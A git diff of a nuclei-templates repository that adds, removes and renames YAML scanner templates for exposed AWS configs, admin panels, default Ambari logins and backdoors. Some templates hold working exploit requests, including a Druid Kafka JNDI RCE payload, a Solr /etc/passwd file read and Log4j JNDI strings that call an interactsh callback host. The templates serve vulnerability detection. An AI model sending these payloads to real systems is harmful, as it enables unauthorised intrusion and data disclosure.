100644 index 0000000000..0a254806bf --- /dev/null +++ b/nuclei-templates/Other/amazon-docker-config.yaml @@ -0,0 +1,16 @@ +id: amazon-docker-config +info: + name: Dockerrun AWS Configuration Exposure + author: pdteam + severity: medium + tags: config,exposure,aws,devops +requests: + - method: GET + path: + - '{{BaseURL}}/Dockerrun.aws.json' + matchers: + - type: word + words: + - 'AWSEBDockerrunVersion' + - 'containerDefinitions' + condition: and diff --git a/nuclei-templates/Other/amazon-mws-auth-token.yaml b/nuclei-templates/Other/amazon-mws-auth-token.yaml new file mode 100644 index 0000000000..eb41de1dae --- /dev/null +++ b/nuclei-templates/Other/amazon-mws-auth-token.yaml @@ -0,0 +1,18 @@ +id: amazon-mws-auth-token + +info: + name: Amazon MWS Auth Token + author: puzzlepeaches + severity: info + tags: exposure,token,aws,amazon,auth + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" diff --git "a/nuclei-templates/Other/amazon-mws-auth-token_\351\207\215\345\244\215\345\211\257\346\234\254.yaml" "b/nuclei-templates/Other/amazon-mws-auth-token_\351\207\215\345\244\215\345\211\257\346\234\254.yaml" deleted file mode 100644 index 28e8063f5e..0000000000 --- "a/nuclei-templates/Other/amazon-mws-auth-token_\351\207\215\345\244\215\345\211\257\346\234\254.yaml" +++ /dev/null @@ -1,15 +0,0 @@ -id: amazon-mws-auth-token -info: - name: Amazon MWS Auth Token - author: puzzlepeaches - severity: info - tags: exposure,token,aws -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - part: body - regex: - - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" diff --git a/nuclei-templates/Other/ambari-default-login-287.yaml b/nuclei-templates/Other/ambari-default-login-287.yaml deleted file mode 100644 index 2fd02dc340..0000000000 --- a/nuclei-templates/Other/ambari-default-login-287.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: ambari-default-login -info: - name: Apache Ambari Default Login - author: pdteam - severity: medium - tags: ambari,default-login,apache -requests: - - raw: - - | - GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - payloads: - username: - - admin - password: - - admin - attack: pitchfork - matchers: - - type: word - words: - - '"Users" : {' - - 'AMBARI.' - condition: and diff --git a/nuclei-templates/Other/ambari-default-login-290.yaml b/nuclei-templates/Other/ambari-default-login-290.yaml new file mode 100644 index 0000000000..e251839b56 --- /dev/null +++ b/nuclei-templates/Other/ambari-default-login-290.yaml @@ -0,0 +1,26 @@ +id: ambari-default-login + +info: + name: Apache Ambari Default Login + author: pdteam + severity: medium + tags: ambari,default-login,apache + +requests: + - raw: + - | + GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers: + - type: word + words: + - '"Users" : {' + - 'AMBARI.' + condition: and diff --git a/nuclei-templates/Other/ambari-exposure-291.yaml b/nuclei-templates/Other/ambari-exposure-291.yaml deleted file mode 100644 index b94a4c0382..0000000000 --- a/nuclei-templates/Other/ambari-exposure-291.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: ambari-exposure - -info: - name: Apache Ambari Exposure / Unauthenticated Access - author: pdteam - severity: medium - tags: panel,apache,ambari,exposure - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers: - - type: word - words: - - 'Ambari' - - 'href="http://www.apache.org/licenses/LICENSE-2.0"' - condition: and diff --git a/nuclei-templates/Other/ambari-exposure.yaml b/nuclei-templates/Other/ambari-exposure.yaml new file mode 100644 index 0000000000..f53aad4e65 --- /dev/null +++ b/nuclei-templates/Other/ambari-exposure.yaml @@ -0,0 +1,16 @@ +id: ambari-exposure +info: + name: Apache Ambari Exposure / Unauthenticated Access + author: pdteam + severity: medium + tags: panel,apache,ambari,exposure +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: word + words: + - 'Ambari' + - 'href="http://www.apache.org/licenses/LICENSE-2.0"' + condition: and diff --git a/nuclei-templates/Other/amcrest-login-296.yaml b/nuclei-templates/Other/amcrest-login-296.yaml index 1c2714211b..19837aca9a 100644 --- a/nuclei-templates/Other/amcrest-login-296.yaml +++ b/nuclei-templates/Other/amcrest-login-296.yaml @@ -4,11 +4,7 @@ info: name: Amcrest Login author: DhiyaneshDK severity: info - description: An Amcrest LDAP user login was discovered. - reference: - - https://www.exploit-db.com/ghdb/7273 - classification: - cwe-id: CWE-200 + reference: https://www.exploit-db.com/ghdb/7273 metadata: shodan-query: html:"amcrest" google-dork: intext:"amcrest" "LDAP User" @@ -30,5 +26,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ampps-admin-panel-305.yaml b/nuclei-templates/Other/ampps-admin-panel-305.yaml deleted file mode 100644 index cd7b7acd7d..0000000000 --- a/nuclei-templates/Other/ampps-admin-panel-305.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: ampps-admin-panel - -info: - name: AMPPS Admin Login Panel - author: deFr0ggy - severity: info - description: An AMPPS Admin login panel was detected. - tags: panel,ampps,login - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}/ampps-admin/index.php?act=login" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - 'Login' - - 'enduser/themes/default/js/universal.js' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ampps-admin-panel.yaml b/nuclei-templates/Other/ampps-admin-panel.yaml new file mode 100644 index 0000000000..3dc153d361 --- /dev/null +++ b/nuclei-templates/Other/ampps-admin-panel.yaml @@ -0,0 +1,35 @@ +id: ampps-admin-panel + +info: + name: AMPPS Admin Login Panel + author: deFr0ggy + severity: info + tags: panel,ampps,login + +requests: + - method: GET + path: + - "{{BaseURL}}/ampps-admin/index.php?act=login" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'Login' + - 'enduser/themes/default/js/universal.js' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' diff --git a/nuclei-templates/Other/ampps-panel-309.yaml b/nuclei-templates/Other/ampps-panel-309.yaml index 4a44ba9360..38d3d1d423 100644 --- a/nuclei-templates/Other/ampps-panel-309.yaml +++ b/nuclei-templates/Other/ampps-panel-309.yaml @@ -4,9 +4,6 @@ info: name: AMPPS Login Panel author: deFr0ggy severity: info - description: An AMPPS login panel was detected. - classification: - cwe-id: CWE-200 tags: panel,ampps,login requests: @@ -36,5 +33,3 @@ requests: group: 1 regex: - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/android-debug-database-exposed-314.yaml b/nuclei-templates/Other/android-debug-database-exposed.yaml similarity index 100% rename from nuclei-templates/Other/android-debug-database-exposed-314.yaml rename to nuclei-templates/Other/android-debug-database-exposed.yaml diff --git a/nuclei-templates/Other/anima-takeover.yaml b/nuclei-templates/Other/anima-takeover-319.yaml similarity index 100% rename from nuclei-templates/Other/anima-takeover.yaml rename to nuclei-templates/Other/anima-takeover-319.yaml diff --git a/nuclei-templates/Other/announcekit-takeover-324.yaml b/nuclei-templates/Other/announcekit-takeover-324.yaml index 37a662aa98..2440b15ac1 100644 --- a/nuclei-templates/Other/announcekit-takeover-324.yaml +++ b/nuclei-templates/Other/announcekit-takeover-324.yaml @@ -1,5 +1,5 @@ id: announcekit-takeover - + info: name: Announcekit Takeover Detection author: melbadry9 @@ -8,7 +8,7 @@ info: reference: - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228 - + requests: - method: GET path: diff --git a/nuclei-templates/Other/ansible-semaphore-panel-327.yaml b/nuclei-templates/Other/ansible-semaphore-panel-327.yaml deleted file mode 100644 index 1f9c74a824..0000000000 --- a/nuclei-templates/Other/ansible-semaphore-panel-327.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: ansible-semaphore-panel - -info: - name: Ansible Semaphore Panel Detect - author: Yuzhe-zhang-0 - severity: info - description: An Ansible Semaphore login panel was detected. - reference: - - https://ansible-semaphore.com/ - - https://github.com/ansible-semaphore/semaphore - classification: - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: http.html:"Semaphore" - tags: panel,ansible,semaphore,cicd,oss - -http: - - method: GET - path: - - '{{BaseURL}}/auth/login' - - matchers-condition: or - matchers: - - type: word - words: - - 'Ansible Semaphore' - - - type: regex - regex: - - 'Semaphore' - -# digest: 4a0a004730450220135b2b9cf2ac5a95af88106fccd7f324c5defbcf3820e1e3ab9b4a9e01209c40022100ab99487635f572c6301e3fe8d9973979f1c0e7892e92e218a3f295511d74c02c:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/ansible-semaphore-panel.yaml b/nuclei-templates/Other/ansible-semaphore-panel.yaml new file mode 100644 index 0000000000..0aa276d1d5 --- /dev/null +++ b/nuclei-templates/Other/ansible-semaphore-panel.yaml @@ -0,0 +1,26 @@ +id: ansible-semaphore-panel + +info: + name: Ansible Semaphore Panel + author: Yuzhe-zhang-0 + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Ansible+Semaphore%22 + tags: panel,ansible,semaphore,cicd + +requests: + - method: GET + redirects: true + max-redirects: 5 + path: + - '{{BaseURL}}/' + + matchers-condition: and + matchers: + - type: word + words: + - 'Ansible Semaphore' + - '>Semaphore' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/antsword-backdoor-333.yaml b/nuclei-templates/Other/antsword-backdoor-333.yaml new file mode 100644 index 0000000000..db80e609e1 --- /dev/null +++ b/nuclei-templates/Other/antsword-backdoor-333.yaml @@ -0,0 +1,40 @@ +id: antsword-backdoor + +info: + name: AntSword Backdoor Detection + author: ffffffff0x + severity: critical + description: An AntSword application backdoor shell was discovered. + remediation: Reinstall AnstSword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms. + reference: + - https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-553 + metadata: + max-request: 1 + tags: backdoor,antsword + +http: + - method: POST + path: + - "{{BaseURL}}/.antproxy.php" + + headers: + Content-Type: application/x-www-form-urlencoded + + body: 'ant=echo md5("antproxy.php");' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "951d11e51392117311602d0c25435d7f" + + - type: status + status: + - 200 + +# digest: 490a0046304402200f629c604d4fd264aab585760907a8d86b3366e52ce07e24da74006ff235664f02202df6576916a5c7fa998e2cf4423ee390de8473de48345e0693e9bc1cd2b8eeb4:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/antsword-backdoor-335.yaml b/nuclei-templates/Other/antsword-backdoor-335.yaml deleted file mode 100644 index 5cf33c9815..0000000000 --- a/nuclei-templates/Other/antsword-backdoor-335.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: antsword-backdoor -info: - name: AntSword Backdoor Detection - author: ffffffff0x - severity: critical - description: An AntSword application backdoor shell was discovered. - reference: - - https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-553 - remediation: Reinstall AnstSword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms. - tags: backdoor,antsword -requests: - - method: POST - path: - - "{{BaseURL}}/.antproxy.php" - headers: - Content-Type: application/x-www-form-urlencoded - body: 'ant=echo md5("antproxy.php");' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "951d11e51392117311602d0c25435d7f" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/Other/apache-apisix-panel-337.yaml b/nuclei-templates/Other/apache-apisix-panel-337.yaml new file mode 100644 index 0000000000..2c6124e710 --- /dev/null +++ b/nuclei-templates/Other/apache-apisix-panel-337.yaml @@ -0,0 +1,30 @@ +id: apache-apisix-panel + +info: + name: Apache APISIX Login Panel + author: pikpikcu + severity: info + description: An Apache APISIX login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + fofa-query: title="Apache APISIX Dashboard" + tags: apache,apisix,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/user/login?redirect=%2F" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Apache APISIX Dashboard' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/apache-apisix-panel.yaml b/nuclei-templates/Other/apache-apisix-panel.yaml deleted file mode 100644 index 6d3f464a45..0000000000 --- a/nuclei-templates/Other/apache-apisix-panel.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: apache-apisix-panel - -info: - name: Apache APISIX Panel detect - author: pikpikcu - severity: info - metadata: - fofa-query: title="Apache APISIX Dashboard" - tags: apache,apisix,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/user/login?redirect=%2F" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Apache APISIX Dashboard' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apache-axis-detect-341.yaml b/nuclei-templates/Other/apache-axis-detect.yaml similarity index 100% rename from nuclei-templates/Other/apache-axis-detect-341.yaml rename to nuclei-templates/Other/apache-axis-detect.yaml diff --git a/nuclei-templates/Other/apache-cocoon-detect-342.yaml b/nuclei-templates/Other/apache-cocoon-detect.yaml similarity index 100% rename from nuclei-templates/Other/apache-cocoon-detect-342.yaml rename to nuclei-templates/Other/apache-cocoon-detect.yaml diff --git a/nuclei-templates/Other/apache-detect-346.yaml b/nuclei-templates/Other/apache-detect-346.yaml deleted file mode 100644 index eeb8966be3..0000000000 --- a/nuclei-templates/Other/apache-detect-346.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: apache-detect -info: - name: Apache Detection - author: philippedelteil - description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained - severity: info - tags: tech,apache - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - - type: regex - part: header - regex: - - "Apache+" - - - type: status - status: - - 200 - - extractors: - - type: kval - part: header - kval: - - Server diff --git a/nuclei-templates/Other/apache-detect-348.yaml b/nuclei-templates/Other/apache-detect-348.yaml new file mode 100644 index 0000000000..4db33ceb08 --- /dev/null +++ b/nuclei-templates/Other/apache-detect-348.yaml @@ -0,0 +1,30 @@ +id: apache-detect +info: + name: Apache Detection + author: philippedelteil + description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained + severity: info + tags: tech,apache + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: regex + part: header + regex: + - "Apache+" + + - type: status + status: + - 200 + + extractors: + - type: kval + part: header + kval: + - Server \ No newline at end of file diff --git a/nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml b/nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml deleted file mode 100644 index c250daba2a..0000000000 --- a/nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml +++ /dev/null @@ -1,99 +0,0 @@ -id: CVE-2023-25194 - -info: - name: Apache Druid Kafka Connect - Remote Code Execution - author: j4vaovo - severity: high - description: | - The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194 - - https://nvd.nist.gov/vuln/detail/CVE-2023-25194 - - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce - - http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html - - https://kafka.apache.org/cve-list - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2023-25194 - cwe-id: CWE-502 - epss-score: 0.89626 - epss-percentile: 0.98692 - cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: apache - product: kafka_connect - shodan-query: html:"Apache Druid" - tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast - -http: - - raw: - - | - POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - { - "type":"kafka", - "spec":{ - "type":"kafka", - "ioConfig":{ - "type":"kafka", - "consumerProperties":{ - "bootstrap.servers":"127.0.0.1:6666", - "sasl.mechanism":"SCRAM-SHA-256", - "security.protocol":"SASL_SSL", - "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";" - }, - "topic":"test", - "useEarliestOffset":true, - "inputFormat":{ - "type":"regex", - "pattern":"([\\s\\S]*)", - "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965", - "columns":[ - "raw" - ] - } - }, - "dataSchema":{ - "dataSource":"sample", - "timestampSpec":{ - "column":"!!!_no_such_column_!!!", - "missingValue":"1970-01-01T00:00:00Z" - }, - "dimensionsSpec":{ - - }, - "granularitySpec":{ - "rollup":false - } - }, - "tuningConfig":{ - "type":"kafka" - } - }, - "samplerConfig":{ - "numRows":500, - "timeoutMs":15000 - } - } - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "dns" - - - type: word - part: body - words: - - 'RecordSupplier' - - - type: status - status: - - 400 -# digest: 4a0a00473045022100f788a795856513e1cd0015cba30415da3dd2e1a04d54f3ce0b6fb0f6f63e6ec9022005b2370ad3db8893c2793d0916510d1ddd938746e3cb8ef40eec403e4e3218d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-dubbo-detect-351.yaml b/nuclei-templates/Other/apache-dubbo-detect.yaml similarity index 100% rename from nuclei-templates/Other/apache-dubbo-detect-351.yaml rename to nuclei-templates/Other/apache-dubbo-detect.yaml diff --git a/nuclei-templates/Other/apache-filename-brute-force-352.yaml b/nuclei-templates/Other/apache-filename-brute-force.yaml similarity index 100% rename from nuclei-templates/Other/apache-filename-brute-force-352.yaml rename to nuclei-templates/Other/apache-filename-brute-force.yaml diff --git a/nuclei-templates/Other/apache-filename-enum-354.yaml b/nuclei-templates/Other/apache-filename-enum-354.yaml deleted file mode 100644 index 2e57212f9c..0000000000 --- a/nuclei-templates/Other/apache-filename-enum-354.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: apache-filename-enum - -info: - name: Apache Filename Enumeration - author: geeknik - description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. - reference: - - https://hackerone.com/reports/210238 - - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ - severity: low - tags: apache,misconfig - -requests: - - method: GET - headers: - Accept: "fake/value" - path: - - "{{BaseURL}}/index" - - matchers-condition: and - matchers: - - type: status - status: - - 406 - - type: word - words: - - "Not Acceptable" - - "Available variants:" - - "
    Apache Server at" - condition: and diff --git a/nuclei-templates/Other/apache-filename-enum.yaml b/nuclei-templates/Other/apache-filename-enum.yaml new file mode 100644 index 0000000000..5a6f43d2f1 --- /dev/null +++ b/nuclei-templates/Other/apache-filename-enum.yaml @@ -0,0 +1,30 @@ +id: apache-filename-enum + +info: + name: Apache Filename Enumeration + author: geeknik + severity: low + description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. + reference: + - https://hackerone.com/reports/210238 + - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ + tags: apache,misconfig + +requests: + - method: GET + headers: + Accept: "fake/value" + path: + - "{{BaseURL}}/index" + + matchers-condition: and + matchers: + - type: status + status: + - 406 + - type: word + words: + - "Not Acceptable" + - "Available variants:" + - "
    Apache Server at" + condition: and diff --git a/nuclei-templates/Other/apache-flink-unauth-rce-355.yaml b/nuclei-templates/Other/apache-flink-unauth-rce-355.yaml index 3c5d43fda3..196536f66e 100644 --- a/nuclei-templates/Other/apache-flink-unauth-rce-355.yaml +++ b/nuclei-templates/Other/apache-flink-unauth-rce-355.yaml @@ -1,15 +1,13 @@ id: apache-flink-unauth-rce info: - name: Apache Flink - Remote Code Execution + name: Apache Flink Unauth RCE author: pikpikcu severity: critical - description: Apache Flink - reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: apache,flink,rce,intrusive,unauth + reference: + - https://www.exploit-db.com/exploits/48978 + - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 + - https://github.com/LandGrey/flink-unauth-rce requests: - raw: - | @@ -39,5 +37,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/05/23 diff --git a/nuclei-templates/Other/apache-solr-file-read.yaml b/nuclei-templates/Other/apache-solr-file-read.yaml deleted file mode 100644 index 4e0270d6ad..0000000000 --- a/nuclei-templates/Other/apache-solr-file-read.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: apache-solr-file-read -info: - name: Apache Solr <= 8.8.1 - Local File Inclusion - author: DhiyaneshDk - severity: high - description: Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion. - reference: - - https://twitter.com/Al1ex4/status/1382981479727128580 - - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ - - https://twitter.com/sec715/status/1373472323538362371 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: apache,solr,lfi -requests: - - raw: - - | - GET /solr/admin/cores?wt=json HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Connection: close - - | - GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Connection: close - extractors: - - type: regex - internal: true - name: core - group: 1 - regex: - - '"name"\:"(.*?)"' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/Other/apache-solr-log4j-CVE-2021-44228.yaml b/nuclei-templates/Other/apache-solr-log4j-CVE-2021-44228.yaml new file mode 100644 index 0000000000..d118daac57 --- /dev/null +++ b/nuclei-templates/Other/apache-solr-log4j-CVE-2021-44228.yaml @@ -0,0 +1,17 @@ +id: apache-solr-log4j-CVE-2021-44228 +info: + name: Log4j (CVE-2021-44228) Detect for Apache Solr + author: toramanemre + severity: Critical +requests: + - method: GET + path: + - "{{BaseURL}}/solr/admin/collections?action=${jndi:ldap://{{interactsh-url}}}&wt=json" + headers: + Host: "{{Host}}" + matchers: + - type: word + part: interactsh_protocol + name: dns + words: + - "dns" diff --git a/nuclei-templates/Other/apache-solr-log4j-cve-2021-44228.yaml b/nuclei-templates/Other/apache-solr-log4j-cve-2021-44228.yaml deleted file mode 100644 index b6615fff92..0000000000 --- a/nuclei-templates/Other/apache-solr-log4j-cve-2021-44228.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: apache-solr-log4j-CVE-2021-44228 - -info: - name: Log4j (CVE-2021-44228) Detect for Apache Solr - author: toramanemre - severity: Critical - -requests: - - method: GET - path: - - "{{BaseURL}}/solr/admin/collections?action=${jndi:ldap://{{interactsh-url}}}&wt=json" - - headers: - Host: "{{Host}}" - - matchers: - - - type: word - part: interactsh_protocol - name: dns - words: - - "dns" diff --git a/nuclei-templates/Other/apache-solr-log4j-rce-372.yaml b/nuclei-templates/Other/apache-solr-log4j-rce-372.yaml new file mode 100644 index 0000000000..bd31144333 --- /dev/null +++ b/nuclei-templates/Other/apache-solr-log4j-rce-372.yaml @@ -0,0 +1,36 @@ +id: apache-solr-log4j-rce + +info: + name: Apache Solr Log4j JNDI RCE + author: Evan Rubinstein,nvn1729 + severity: critical + description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+. + reference: + - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228 + - https://twitter.com/sirifu4k1/status/1470011568834424837 + - https://github.com/apache/solr/pull/454 + tags: solr,oast,log4j,rce,apache,jndi + +requests: + - method: GET + path: + - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/nuclei-templates/Other/apache-solr-log4j-rce.yaml b/nuclei-templates/Other/apache-solr-log4j-rce.yaml deleted file mode 100644 index 9a19f69c70..0000000000 --- a/nuclei-templates/Other/apache-solr-log4j-rce.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: apache-solr-log4j-rce -info: - name: Apache Solr Log4j JNDI RCE - author: Evan Rubinstein,nvn1729 - severity: critical - description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+. - reference: - - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228 - - https://twitter.com/sirifu4k1/status/1470011568834424837 - - https://github.com/apache/solr/pull/454 - tags: solr,oast,log4j,rce,apache,jndi -requests: - - method: GET - path: - - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D" - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - type: regex - part: interactsh_request - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - extractors: - - type: regex - part: interactsh_request - group: 1 - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/nuclei-templates/Other/apache-tomcat-snoop-374.yaml b/nuclei-templates/Other/apache-tomcat-snoop-374.yaml deleted file mode 100644 index 266c29ed79..0000000000 --- a/nuclei-templates/Other/apache-tomcat-snoop-374.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: apache-tomcat-snoop - -info: - name: Apache Tomcat example page disclosure - snoop - author: pdteam - severity: low - description: The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection. - reference: https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks - tags: apache,misconfig,tomcat,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/examples/jsp/snp/snoop.jsp" - - matchers-condition: and - matchers: - - type: word - words: - - 'Request URI: /examples/jsp/snp/snoop.jsp' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apache-tomcat-snoop.yaml b/nuclei-templates/Other/apache-tomcat-snoop.yaml new file mode 100644 index 0000000000..15b5a1beab --- /dev/null +++ b/nuclei-templates/Other/apache-tomcat-snoop.yaml @@ -0,0 +1,24 @@ +id: apache-tomcat-snoop + +info: + name: Apache Tomcat example page disclosure - snoop + author: pdteam + severity: low + description: The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection. + reference: https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks + tags: apache + +requests: + - method: GET + path: + - "{{BaseURL}}/examples/jsp/snp/snoop.jsp" + + matchers-condition: and + matchers: + - type: word + words: + - 'Request URI: /examples/jsp/snp/snoop.jsp' + + - type: status + status: + - 200 \ No newline at end of file diff --git 